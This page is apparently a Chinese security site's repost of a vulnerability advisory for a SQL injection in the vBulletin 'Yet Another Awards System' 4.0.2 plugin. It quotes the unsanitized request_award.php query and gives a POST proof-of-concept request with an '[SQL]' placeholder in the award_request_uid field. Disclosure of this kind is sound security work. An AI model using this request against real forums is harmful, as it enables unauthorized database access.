当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

vBulletin Yet Another Awards System 4.0.2 SQL注射

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

标题: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day 
作者: Backsl@sh/Dan 
 
软件下载: ?t=232684 
 
影响版本: 4.0.2+ 
问题出在request_award.php. 
 
 
$vbulletin->input->clean_array_gpc('p', array( 
 
            'award_id' => TYPE_UINT, 
 
            //'award_request_name' => TYPE_STR, 
 
            //'award_request_recipient_name' => TYPE_STR, 
 
            'award_request_reason' => TYPE_STR, 
 
            'award_request_uid' => TYPE_UNIT, 
 
    )); 
 
  
 
> $award_request_uid = $vbulletin->GPC['award_request_uid']; 
 
> > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')"); 
 
  
 
$award_request_uid is used within an insert into statement, unsanitized. 
 
 测试证明
 
/request_award.php 
 
POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit 
 
  
  ,涛涛电脑知识网,涛涛电脑知识网

相关文章
  • 没有相关文章
共有评论 0相关评论
发表我的评论
  • 大名:
  • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1